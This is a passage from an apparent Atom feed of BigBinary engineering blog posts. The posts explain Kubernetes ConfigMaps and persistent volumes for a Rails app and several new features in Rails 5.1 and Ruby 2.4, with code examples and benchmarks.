imagePullSecrets:        - name: registrykey</code></pre><p>Now let's create a deployment using above template.</p><pre><code class="language-bash">$ kubectl create -f  test-deployment.ymldeployment &quot;test-pv&quot; created</code></pre><p>Once the deployment is created, pod running from that deployment will start sidekiq using the <code>sidekiq.yml</code> mounted at <code>/etc/sidekiq/config/sidekiq.yml</code>.</p><p>Let's check this on the pod.</p><pre><code class="language-bash">deployer@test-staging-2766611832-jst35:~$ cat /etc/sidekiq/config/sidekiq_1.yml---:verbose: true:environment: staging:pidfile: tmp/pids/sidekiq_1.pid:logfile: log/sidekiq_1.log:concurrency: 20:timeout: 300:dynamic: true:queues:  - [default, 1]</code></pre><p>Our sidekiq process uses this configuration to start sidekiq.Looks like configmap did its job.</p><p>Further if we want to add one new queue to sidekiq,we can simply modify the configmap template and restart the pod.</p><p>For example if we want to add <code>mailer</code> queue we will modify template as shown below.</p><pre><code class="language-yaml">apiVersion: v1kind: ConfigMapmetadata:  name: test-staging-sidekiq  labels:    name: test-staging-sidekiq  namespace: testdata:  config: |-    ---    :verbose: true    :environment: staging    :pidfile: tmp/pids/sidekiq_1.pid    :logfile: log/sidekiq_1.log    :concurrency: 20    :queues:      - [default, 1]      - [mailer, 1]    :dynamic: true    :timeout: 300</code></pre><p>Let's launch this configmap using following command.</p><pre><code class="language-bash">$ kubectl apply -f  test-configmap.ymlconfigmap &quot;test-staging-sidekiq&quot; configured</code></pre><p>Once the pod is restarted, it will use new sidekiq configuration fetched from the configmap.</p><p>In this way, we keep our Rails application configuration files out of the source-code and tweak them as needed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 adds support for limit in batch processing]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-adds-support-for-limit-in-batch-processing"/>
      <updated>2017-05-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-adds-support-for-limit-in-batch-processing</id>
      <content type="html"><![CDATA[<p>Before Rails 5.1, we were not able to limit the number of records fetched inbatch processing.</p><p>Let's take an example. Assume our system has 20 users.</p><pre><code class="language-ruby"> User.find_each{ |user| puts user.id }</code></pre><p>The above code will print ids of all the 20 users.</p><p>There was no way to limit the number of records. Active Record's <code>limit</code> methoddidn't work for batches.</p><pre><code class="language-ruby"> User.limit(10).find_each{ |user| puts user.id }</code></pre><p>The above code still prints ids of all 20 users, even though the intention wasto limit the records fetched to 10.</p><p>Rails 5.1<a href="https://github.com/rails/rails/commit/451437c6f57e66cc7586ec966e530493927098c7">has added support</a>to limit the records in batch processing.</p><pre><code class="language-ruby"> User.limit(10).find_each{ |user| puts user.id }</code></pre><p>The above code will print only 10 ids in Rails 5.1.</p><p>We can make use of limit in <code>find_in_batches</code> and <code>in_batches</code> as well.</p><pre><code class="language-ruby"> total_count = 0 User.limit(10).find_in_batches(batch_size: 4) do |batch|   total_count += batch.count end total_count#=&gt; 10</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 doesn't share thread_mattr_accessor variable]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-does-not-share-thread-mattr-accessor-variable-with-sub-class"/>
      <updated>2017-05-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-does-not-share-thread-mattr-accessor-variable-with-sub-class</id>
      <content type="html"><![CDATA[<p>Rails 5.0 provides<a href="rails-5-adds-ability-to-create-module-and-class-level-variables-on-per-thread-basis">mattr_accessor</a>to define class level variables on a per thread basis.</p><p>However, the variable was getting shared with child classes as well. That meantwhen a child class changed value of the variable, then its effect was seen inthe parent class.</p><pre><code class="language-ruby">class Player  thread_mattr_accessor :aliasendclass PowerPlayer &lt; PlayerendPlayer.alias = 'Gunner'PowerPlayer.alias = 'Bomber'&gt; PowerPlayer.alias#=&gt; &quot;Bomber&quot;&gt; Player.alias#=&gt; &quot;Bomber&quot;</code></pre><p>This isn't the intended behavior as per OOPS norms.</p><p>In Rails 5.1<a href="https://github.com/rails/rails/pull/25681">this problem was resolved</a>. Now achange in value of <code>thread_mattr_accessor</code> in child class will not affect valuein its parent class.</p><pre><code class="language-ruby">class Player  thread_mattr_accessor :aliasendclass PowerPlayer &lt; PlayerendPlayer.alias = 'Gunner'PowerPlayer.alias = 'Bomber'&gt; PowerPlayer.alias#=&gt; &quot;Bomber&quot;&gt; Player.alias#=&gt; &quot;Gunner&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 introduced assert_changes and assert_no_changes]]></title>
       <author><name>Narendra Rajput</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-introduced-assert_changes-and-assert_no_changes"/>
      <updated>2017-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-introduced-assert_changes-and-assert_no_changes</id>
      <content type="html"><![CDATA[<p>Rails 5.1 has introduced<a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_changes">assert_changes</a>and<a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_no_changes">assert_no_changes</a>.It can be seen as a more generic version of<a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_difference">assert_difference</a>and<a href="http://api.rubyonrails.org/classes/ActiveSupport/Testing/Assertions.html#method-i-assert_no_difference">assert_no_difference</a>.</p><h3>assert_changes</h3><p><code>assert_changes</code> asserts the value of an expression is changed before and afterinvoking the block. The specified expression can be string like<code>assert_difference</code>.</p><pre><code class="language-ruby">@user = users(:john)assert_changes 'users(:john).status' do  post :update, params: {id: @user.id, user: {status: 'online'}}end</code></pre><p>We can also pass a lambda as an expression.</p><pre><code class="language-ruby">@user = users(:john)assert_changes -&gt; {users(:john).status} do  post :update, params: {id: @user.id, user: {status: 'online'}}end</code></pre><p><code>assert_changes</code> also allows options <code>:from</code> and <code>:to</code> to specify initial andfinal state of expression.</p><pre><code class="language-ruby">@light = Light.newassert_changes -&gt; { @light.status }, from: 'off', to: 'on' do  @light.turn_onend</code></pre><p>We can also specify test failure message.</p><pre><code class="language-ruby">@invoice = invoices(:bb_client)assert_changes -&gt; { @invoice.status }, to: 'paid', 'Expected the invoice to be marked paid' do  @invoice.make_paymentend</code></pre><h3>assert_no_changes</h3><p><code>assert_no_changes</code> has same options and asserts that the expression doesn'tchange before and after invoking the block.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Forward ActiveRecord::Relation#count to Enumerable#count]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/forwarding-active-record-relation-count-to-enumerable-count"/>
      <updated>2017-05-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/forwarding-active-record-relation-count-to-enumerable-count</id>
      <content type="html"><![CDATA[<p>Let's say that we want to know all the deliveries in progress for an order.</p><p>The following code would do the job.</p><pre><code class="language-ruby">class Order  has_many :deliveries  def num_deliveries_in_progress    deliveries.select { |delivery| delivery.in_progress? }.size  endend</code></pre><p>But usage of <code>count</code> should make more sense over a <code>select</code>, right?</p><pre><code class="language-ruby">class Order  has_many :deliveries  def num_deliveries_in_progress    deliveries.count { |delivery| delivery.in_progress? }  endend</code></pre><p>However the changed code would return count for all the order deliveries, ratherthan returning only the ones in progress.</p><p>That's because <code>ActiveRecord::Relation#count</code> silently discards the blockargument.</p><p>Rails 5.1<a href="https://github.com/rails/rails/pull/24203/files#diff-e0e70620d0897d6819a6bcc2b5ee7a73">fixed this issue</a>.</p><pre><code class="language-ruby">module ActiveRecord  module Calculations    def count(column_name = nil)      if block_given?        to_a.count { |*block_args| yield(*block_args) }      else        calculate(:count, column_name)      end    end  endend</code></pre><p>So now, we can pass a block to <code>count</code> method.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.1 has introduced Date#all_day helper]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-1-has-introduced-date-all_day-helper"/>
      <updated>2017-04-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-1-has-introduced-date-all_day-helper</id>
      <content type="html"><![CDATA[<p>Sometimes, we want to query records over the whole day for a given date.</p><pre><code class="language-ruby">&gt;&gt; User.where(created_at: Date.today.beginning_of_day..Date.today.end_of_day)=&gt; SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;created_at&quot; BETWEEN $1 AND $2) [[&quot;created_at&quot;, 2017-04-09 00:00:00 UTC], [&quot;created_at&quot;, 2017-04-09 23:59:59 UTC]]</code></pre><p>Rails 5.1 has<a href="https://github.com/rails/rails/pull/24930">introduced a helper method</a> forcreating this range object for a given date in the form of <code>Date#all_day</code>.</p><pre><code class="language-ruby">&gt;&gt; User.where(created_at: Date.today.all_day)=&gt; SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE (&quot;users&quot;.&quot;created_at&quot; BETWEEN $1 AND $2) [[&quot;created_at&quot;, 2017-04-09 00:00:00 UTC], [&quot;created_at&quot;, 2017-04-09 23:59:59 UTC]]</code></pre><p>We can confirm that the <code>Date#all_day</code> method returns the range object for agiven date.</p><pre><code class="language-ruby">&gt;&gt; Date.today.all_day=&gt; Sun, 09 Apr 2017 00:00:00 UTC +00:00..Sun, 09 Apr 2017 23:59:59 UTC +00:00</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Binding irb - Runtime Invocation for IRB]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/binding-irb"/>
      <updated>2017-04-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/binding-irb</id>
      <content type="html"><![CDATA[<p>It's very common to see a ruby programmer write a few <code>puts</code> or <code>p</code> statements,either for debugging or for knowing the value of variables.</p><p><a href="https://github.com/pry/pry">pry</a> did make our lives easier with the usage of<code>binding.pry</code>. However, it was still a bit of an inconvenience to have itinstalled at runtime, while working with the <code>irb</code>.</p><p>Ruby 2.4 has now introduced <code>binding.irb</code>. By simply adding <code>binding.irb</code> to ourcode we can open an IRB session.</p><pre><code class="language-ruby">class ConvolutedProcessdef do_something@variable = 10    binding.irb    # opens a REPL hereendendirb(main):029:0\* ConvolutedProcess.new.do_somethingirb(#&lt;ConvolutedProcess:0x007fc55c827f48&gt;):001:0&gt; @variable=&gt; 10</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Kubernetes Persistent volume to store persistent data]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-kubernetes-persistent-volume-for-persistent-data-storage"/>
      <updated>2017-04-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-kubernetes-persistent-volume-for-persistent-data-storage</id>
      <content type="html"><![CDATA[<p>In one of our projects we are running Rails application on<a href="http://kubernetes.io/">Kubernetes</a> cluster. It is proven tool for managing anddeploying docker containers in production.</p><p>In kubernetes containers are managed using<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a> and they aretermed as <a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>. <code>deployment</code> holdsthe specification of pods. It is responsible to run the pod with specifiedresources. When <code>pod</code> is restarted or <code>deployment</code> is deleted then data is loston pod. We need to retain data out of pods lifecycle when the <code>pod</code> or<code>deployment</code> is destroyed.</p><p>We use docker-compose during development mode. In docker-compose linking betweenhost directory and container directory works out of the box. We wanted similarmechanism with Kubernetes to link volumes. In kubernetes we have various typesof <a href="https://kubernetes.io/docs/user-guide/volumes/#types-of-volumes1">volumes</a>to use. We chose<a href="http://kubernetes.io/docs/user-guide/persistent-volumes/">persistent volume</a>with <a href="https://aws.amazon.com/ebs/">AWS EBS</a> storage. We used persistent volumeclaim as per the need of application.</p><p>As per the<a href="http://kubernetes.io/docs/user-guide/persistent-volumes/">Persistent Volume's definition</a>(PV) Cluster administrators must first create storage in order for Kubernetes tomount it.</p><p>Our Kubernetes cluster is hosted on AWS. We created AWS EBS volumes which can beused to create persistent volume.</p><p>Let's create a sample volume using aws cli and try to use it in the deployment.</p><pre><code class="language-bash">aws ec2 create-volume --availability-zone us-east-1a --size 20 --volume-type gp2</code></pre><p>This will create a volume in <code>us-east-1a</code> region. We need to note <code>VolumeId</code>once the volume is created.</p><pre><code class="language-bash">$ aws ec2 create-volume --availability-zone us-east-1a --size 20 --volume-type gp2{    &quot;AvailabilityZone&quot;: &quot;us-east-1a&quot;,    &quot;Encrypted&quot;: false,    &quot;VolumeType&quot;: &quot;gp2&quot;,    &quot;VolumeId&quot;: &quot;vol-123456we7890ilk12&quot;,    &quot;State&quot;: &quot;creating&quot;,    &quot;Iops&quot;: 100,    &quot;SnapshotId&quot;: &quot;&quot;,    &quot;CreateTime&quot;: &quot;2017-01-04T03:53:00.298Z&quot;,    &quot;Size&quot;: 20}</code></pre><p>Now let's create a persistent volume template <code>test-pv</code> to create volume usingthis EBS storage.</p><pre><code class="language-yaml">kind: PersistentVolumeapiVersion: v1metadata:  name: test-pv  labels:    type: amazonEBSspec:  capacity:    storage: 10Gi  accessModes:    - ReadWriteMany  awsElasticBlockStore:    volumeID: &lt;your-volume-id&gt;    fsType: ext4</code></pre><p>Once we had template to create persistent volume, we used<a href="http://kubernetes.io/docs/user-guide/kubectl/">kubectl</a> to launch it. Kubectlis command line tool to interact with Kubernetes cluster.</p><pre><code class="language-bash">$ kubectl create -f  test-pv.ymlpersistentvolume &quot;test-pv&quot; created</code></pre><p>Once persistent volume is created you can check using following command.</p><pre><code class="language-bash">$ kubectl get pvNAME       CAPACITY   ACCESSMODES   RECLAIMPOLICY   STATUS      CLAIM               REASON    AGEtest-pv     10Gi        RWX           Retain          Available                                7s</code></pre><p>Now that our persistent volume is in available state, we can claim it bycreating<a href="http://kubernetes.io/docs/user-guide/persistent-volumes/#persistentvolumeclaims">persistent volume claim policy</a>.</p><p>We can define persistent volume claim using following template <code>test-pvc.yml</code>.</p><pre><code class="language-yaml">kind: PersistentVolumeClaimapiVersion: v1metadata:  name: test-pvc  labels:    type: amazonEBSspec:  accessModes:    - ReadWriteMany  resources:    requests:      storage: 10Gi</code></pre><p>Let's create persistent volume claim using above template.</p><pre><code class="language-bash">$ kubectl create -f  test-pvc.ymlpersistentvolumeclaim &quot;test-pvc&quot; created</code></pre><p>After creating the persistent volume claim, our persistent volume will changefrom <code>available</code> state to <code>bound</code> state.</p><pre><code class="language-bash">$ kubectl get pvNAME       CAPACITY   ACCESSMODES   RECLAIMPOLICY   STATUS     CLAIM               REASON    AGEtest-pv    10Gi        RWX           Retain          Bound      default/test-pvc              2m$kubectl get pvcNAME        STATUS    VOLUME    CAPACITY   ACCESSMODES   AGEtest-pvc    Bound     test-pv   10Gi        RWX           1m</code></pre><p>Now we have persistent volume claim available on our Kubernetes cluster, Let'suse it in deployment.</p><h3>Deploying Kubernetes application</h3><p>We will use following deployment template as <code>test-pv-deployment.yml</code>.</p><pre><code class="language-yaml">apiVersion: extensions/v1beta1kind: Deploymentmetadata:  name: test-pv  labels:    app: test-pvspec:  replicas: 1  template:    metadata:      labels:        app: test-pv        tier: frontend    spec:      containers:        - image: &lt;your-repo&gt;/&lt;your-image-name&gt;:latest          name: test-pv          imagePullPolicy: Always          env:            - name: APP_ENV              value: staging            - name: UNICORN_WORKER_PROCESSES              value: &quot;2&quot;          volumeMounts:            - name: test-volume              mountPath: &quot;/&lt;path-to-my-app&gt;/shared/data&quot;          ports:            - containerPort: 80      imagePullSecrets:        - name: registrypullsecret      volumes:        - name: test-volume          persistentVolumeClaim:            claimName: test-pvc</code></pre><p>Now launch the deployment using following command.</p><pre><code class="language-bash">$ kubectl create -f  test-pvc.ymldeployment &quot;test-pv&quot; created</code></pre><p>Once the deployment is up and running all the contents on <code>shared</code> directorywill be stored on persistent volume claim. Further when pod or deploymentcrashes for any reason our data will be always retained on the persistentvolume. We can use it to launch the application deployment.</p><p>This solved our goal of retaining data across deployments across <code>pod</code> restarts.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 has added additional parameters for Logger#new]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-added-additional-parameters-for-logger-new"/>
      <updated>2017-04-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-added-additional-parameters-for-logger-new</id>
      <content type="html"><![CDATA[<p>The<a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/logger/rdoc/Logger.html#method-c-new">Logger</a>class in Ruby provides a simple but sophisticated logging utility.</p><p>After creating the logger object we need to set its level.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">require 'logger'logger = Logger.new(STDOUT)logger.level = Logger::INFO</code></pre><p>If we are working with <code>ActiveRecord::Base.logger</code>, then same code would looksomething like this.</p><pre><code class="language-ruby">require 'logger'ActiveRecord::Base.logger = Logger.new(STDOUT)ActiveRecord::Base.logger.level = Logger::INFO</code></pre><p>As we can see in the both the cases we need to set the level separately afterinstantiating the object.</p><h3>Ruby 2.4</h3><p>In Ruby 2.4, <code>level</code> can now be specified in the constructor.</p><pre><code class="language-ruby">#ruby 2.4require 'logger'logger = Logger.new(STDOUT, level: Logger::INFO)# let's verify itlogger.level      #=&gt; 1</code></pre><p>Similarly, other options such as <code>progname</code>, <code>formatter</code> and <code>datetime_format</code>,which prior to Ruby 2.4 had to be explicitly set, can now be set during theinstantiation.</p><pre><code class="language-ruby">#ruby 2.3require 'logger'logger = Logger.new(STDOUT)logger.level = Logger::INFOlogger.progname = 'bigbinary'logger.datetime_format = '%Y-%m-%d %H:%M:%S'logger.formatter = proc do |severity, datetime, progname, msg|  &quot;#{severity} #{datetime} ==&gt; App: #{progname}, Message: #{msg}\n&quot;endlogger.info(&quot;Program started...&quot;)#=&gt; INFO 2017-03-16 18:43:58 +0530 ==&gt; App: bigbinary, Message: Program started...</code></pre><p>Here is same stuff in Ruby 2.4.</p><pre><code class="language-ruby">#ruby 2.4require 'logger'logger = Logger.new(STDOUT,  level: Logger::INFO,  progname: 'bigbinary',  datetime_format: '%Y-%m-%d %H:%M:%S',  formatter: proc do |severity, datetime, progname, msg|    &quot;#{severity} #{datetime} ==&gt; App: #{progname}, Message: #{msg}\n&quot;  end)logger.info(&quot;Program started...&quot;)#=&gt; INFO 2017-03-16 18:47:39 +0530 ==&gt; App: bigbinary, Message: Program started...</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 has default basename for Tempfile#create]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-default-basename-for-tempfile-create"/>
      <updated>2017-04-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-default-basename-for-tempfile-create</id>
      <content type="html"><![CDATA[<h3>Tempfile class</h3><p><a href="http://ruby-doc.org/stdlib-2.4.0/libdoc/tempfile/rdoc/Tempfile.html">Tempfile</a>is used for managing temporary files in Ruby. A Tempfile object creates atemporary file with a unique filename. It behaves just like a File object, andtherefore we can perform all the usual file operations on it.</p><h3>Why Tempfile when we can use File</h3><p>These days it is common to store file on services like S3. Let's say that wehave a <code>users.csv</code> file on S3. Working with this file remotely is problematic.In such cases it is desirable to download the file on local machine formanipulation. After the work is done then file should be deleted. Tempfile isideal for such cases.</p><h3>Basename for tempfile</h3><p>If we want to create a temporary file then we needed to pass parameter to itprior to Ruby 2.3.</p><pre><code class="language-ruby">require 'tempfile'file = Tempfile.new('bigbinary')#=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/bigbinary-20170304-10828-1w02mqi&gt;</code></pre><p>As we can see above the generated file name begins with &quot;bigbinary&quot; word.</p><p>Since Tempfile ensures that the generate filename will always be unique thepoint of passing the argument is meaningless. Ruby doc calls this passing&quot;basename&quot;.</p><p>So in Ruby 2.3.0 it was <a href="https://github.com/ruby/ruby/pull/523">decided</a> thatthe basename parameter was meaningless for <code>Tempfile#new</code> and an empty stringwill be the default value.</p><pre><code class="language-ruby">require 'tempfile'file = Tempfile.new#=&gt; #&lt;Tempfile:/var/folders/jv/fxkfk9_10nb_964rvrszs2540000gn/T/20170304-10828-1v855bf&gt;</code></pre><p>But the same was not implemented for <code>Tempfile#create</code>.</p><pre><code class="language-ruby"># Ruby 2.3.0require 'tempfile'Tempfile.create do |f|  f.write &quot;hello&quot;endArgumentError: wrong number of arguments (given 0, expected 1..2)</code></pre><p>This was <a href="https://bugs.ruby-lang.org/issues/11965">fixed</a> in Ruby 2.4. So nowthe basename parameter for <code>Tempfile.create</code> is set to empty string by default,to keep it consistent with the <code>Tempfile#new</code> method.</p><pre><code class="language-ruby"># Ruby 2.4require 'tempfile'Tempfile.create do |f|  f.write &quot;hello&quot;end=&gt; 5</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[New arguments support for float & integer modifiers]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/new-ndigits-arguments-supported-for-float-modifiers-in-ruby-2-4"/>
      <updated>2017-03-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/new-ndigits-arguments-supported-for-float-modifiers-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, there are many methods available which help us to modify a float orinteger value.</p><h3>Ruby 2.3.x</h3><p>In the previous versions of Ruby, we could use methods such as <code>floor</code>, <code>ceil</code>and <code>truncate</code> in following ways.</p><pre><code class="language-ruby">5.54.floor          #=&gt; 55.54.ceil           #=&gt; 65.54.truncate       #=&gt; 5</code></pre><p>Providing an argument to these methods would result in <code>ArgumentError</code>exception.</p><h3>Ruby 2.4</h3><p>Ruby community decided to come up with an option to<a href="https://bugs.ruby-lang.org/issues/12245">add precision argument</a> .</p><p>The precision argument, which can be negative, helps us to get result to therequired precision to either side of the decimal point.</p><p>The default value for the precision argument is 0.</p><pre><code class="language-ruby">876.543.floor(-2)       #=&gt; 800876.543.floor(-1)       #=&gt; 870876.543.floor           #=&gt; 876876.543.floor(1)        #=&gt; 876.5876.543.floor(2)        #=&gt; 876.54876.543.ceil(-2)        #=&gt; 900876.543.ceil(-1)        #=&gt; 880876.543.ceil            #=&gt; 877876.543.ceil(1)         #=&gt; 876.6876.543.ceil(2)         #=&gt; 876.55876.543.truncate(-2)    #=&gt; 800876.543.truncate(-1)    #=&gt; 870876.543.truncate        #=&gt; 876876.543.truncate(1)     #=&gt; 876.5876.543.truncate(2)     #=&gt; 876.54</code></pre><p>These methods all work the same on Integer as well.</p><pre><code class="language-ruby">5.floor(2)              #=&gt; 5.05.ceil(2)               #=&gt; 5.05.truncate(2)           #=&gt; 5.0</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 adds Enumerable#uniq & Enumerable::Lazy#uniq]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/enumerable-uniq-and-enumerable-lazy-uniq-part-of-ruby-2-4"/>
      <updated>2017-03-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/enumerable-uniq-and-enumerable-lazy-uniq-part-of-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, we commonly use <code>uniq</code> method on an array to fetch the collection ofall unique elements. But there may be cases where we might need elements in ahash by virtue of uniqueness of its values.</p><p>Let's consider an example of countries that have hosted the Olympics. We onlywant to know when was the first time a country hosted it.</p><pre><code class="language-ruby"># given object{ 1896 =&gt; 'Athens',  1900 =&gt; 'Paris',  1904 =&gt; 'Chicago',  1906 =&gt; 'Athens',  1908 =&gt; 'Rome' }# expected outcome{ 1896 =&gt; 'Athens',  1900 =&gt; 'Paris',  1904 =&gt; 'Chicago',  1908 =&gt; 'Rome' }</code></pre><p>One way to achieve this is to have a collection of unique country names and thencheck if that value is already taken while building the result.</p><pre><code class="language-ruby">olympics ={ 1896 =&gt; 'Athens',  1900 =&gt; 'Paris',  1904 =&gt; 'Chicago',  1906 =&gt; 'Athens',  1908 =&gt; 'Rome' }unique_nations = olympics.values.uniqolympics.select{ |year, country| !unique_nations.delete(country).nil? }#=&gt; {1896=&gt;&quot;Athens&quot;, 1900=&gt;&quot;Paris&quot;, 1904=&gt;&quot;Chicago&quot;, 1908=&gt;&quot;Rome&quot;}</code></pre><p>As we can see, the above code requires constructing an additional array<code>unique_nations</code>.</p><p>In processing larger data, loading an array of considerably big size in memoryand then carrying out further processing on it, may result in performance andmemory issues.</p><p>In Ruby 2.4, <code>Enumerable</code> class introduces <code>uniq</code><a href="https://bugs.ruby-lang.org/issues/11090">method</a> that collects unique elementswhile iterating over the enumerable object.</p><p>The usage is similar to that of Array#uniq. Uniqueness can be determined by theelements themselves or by a value yielded by the block passed to the <code>uniq</code>method.</p><pre><code class="language-ruby">olympics = {1896 =&gt; 'Athens', 1900 =&gt; 'Paris', 1904 =&gt; 'Chicago', 1906 =&gt; 'Athens', 1908 =&gt; 'Rome'}olympics.uniq { |year, country| country }.to_h#=&gt; {1896=&gt;&quot;Athens&quot;, 1900=&gt;&quot;Paris&quot;, 1904=&gt;&quot;Chicago&quot;, 1908=&gt;&quot;Rome&quot;}</code></pre><p>Similar method is also implemented in <code>Enumerable::Lazy</code> class. Hence we can nowcall <code>uniq</code> on lazy enumerables.</p><pre><code class="language-ruby">(1..Float::INFINITY).lazy.uniq { |x| (x**2) % 10 }.first(6)#=&gt; [1, 2, 3, 4, 5, 10]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 optimized lstrip & strip for ASCII strings]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-has-optimized-lstrip-and-strip-methods"/>
      <updated>2017-03-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-has-optimized-lstrip-and-strip-methods</id>
      <content type="html"><![CDATA[<p>Ruby has <code>lstrip</code> and <code>rstrip</code> methods which can be used to remove leading andtrailing whitespaces respectively from a string.</p><p>Ruby also has <code>strip</code> method which is a combination of lstrip and rstrip and canbe used to remove both, leading and trailing whitespaces, from a string.</p><pre><code class="language-ruby">&quot;    Hello World    &quot;.lstrip    #=&gt; &quot;Hello World    &quot;&quot;    Hello World    &quot;.rstrip    #=&gt; &quot;    Hello World&quot;&quot;    Hello World    &quot;.strip     #=&gt; &quot;Hello World&quot;</code></pre><p>Prior to Ruby 2.4, the <code>rstrip</code> method was optimized for performance, but the<code>lstrip</code> and <code>strip</code> were somehow missed. In Ruby 2.4, <code>String#lstrip</code> and<code>String#strip</code> methods too have been<a href="https://bugs.ruby-lang.org/issues/12788">optimized</a> to get the performancebenefit of <code>String#rstrip</code> .</p><p>Let's run following snippet in Ruby 2.3 and Ruby 2.4 to benchmark and comparethe performance improvement.</p><pre><code class="language-ruby">require 'benchmark/ips'Benchmark.ips do |bench|  str1 = &quot; &quot; * 10_000_000 + &quot;hello world&quot; + &quot; &quot; * 10_000_000  str2 = str1.dup  str3 = str1.dup  bench.report('String#lstrip') do    str1.lstrip  end  bench.report('String#rstrip') do    str2.rstrip  end  bench.report('String#strip') do    str3.strip  endend</code></pre><h4>Result for Ruby 2.3</h4><pre><code class="language-ruby">Warming up --------------------------------------       String#lstrip     1.000  i/100ms       String#rstrip     8.000  i/100ms        String#strip     1.000  i/100msCalculating -------------------------------------       String#lstrip     10.989  ( 0.0%) i/s -     55.000  in   5.010903s       String#rstrip     92.514  ( 5.4%) i/s -    464.000  in   5.032208s        String#strip     10.170  ( 0.0%) i/s -     51.000  in   5.022118s</code></pre><h4>Result for Ruby 2.4</h4><pre><code class="language-ruby">Warming up --------------------------------------       String#lstrip    14.000  i/100ms       String#rstrip     8.000  i/100ms        String#strip     6.000  i/100msCalculating -------------------------------------       String#lstrip    143.424  ( 4.2%) i/s -    728.000  in   5.085311s       String#rstrip     89.150  ( 5.6%) i/s -    448.000  in   5.041301s        String#strip     67.834  ( 4.4%) i/s -    342.000  in   5.051584s</code></pre><p>From the above results, we can see that in Ruby 2.4, <code>String#lstrip</code> is around14x faster while <code>String#strip</code> is around 6x faster. <code>String#rstrip</code> asexpected, has nearly the same performance as it was already optimized inprevious versions.</p><h3>Performance remains same for multi-byte strings</h3><p>Strings can have single byte or multi-byte characters.</p><p>For example <code>L Hello World</code> is a multi-byte string because of the presence of<code></code> which is a multi-byte character.</p><pre><code class="language-ruby">'e'.bytesize        #=&gt; 1''.bytesize        #=&gt; 2</code></pre><p>Let's do performance benchmarking with string <code>L hello world</code> instead of<code>hello world</code>.</p><h4>Result for Ruby 2.3</h4><pre><code class="language-ruby">Warming up --------------------------------------       String#lstrip     1.000  i/100ms       String#rstrip     1.000  i/100ms        String#strip     1.000  i/100msCalculating -------------------------------------       String#lstrip     11.147  ( 9.0%) i/s -     56.000  in   5.034363s       String#rstrip      8.693  ( 0.0%) i/s -     44.000  in   5.075011s        String#strip      5.020  ( 0.0%) i/s -     26.000  in   5.183517s</code></pre><h4>Result for Ruby 2.4</h4><pre><code class="language-ruby">Warming up --------------------------------------       String#lstrip     1.000  i/100ms       String#rstrip     1.000  i/100ms        String#strip     1.000  i/100msCalculating -------------------------------------       String#lstrip     10.691  ( 0.0%) i/s -     54.000  in   5.055101s       String#rstrip      9.524  ( 0.0%) i/s -     48.000  in   5.052678s        String#strip      4.860  ( 0.0%) i/s -     25.000  in   5.152804s</code></pre><p>As we can see, the performance for multi-byte strings is almost the same acrossRuby 2.3 and Ruby 2.4.</p><h4>Explanation</h4><p>The optimization introduced is related to how the strings are parsed to detectfor whitespaces. Checking for whitespaces in multi-byte string requires anadditional overhead. So the <a href="https://bugs.ruby-lang.org/issues/12788">patch</a>adds an initial condition to check if the string is a single byte string, and ifso, processes it separately.</p><p>In most of the cases, the strings are single byte so the performance improvementwould be visible and 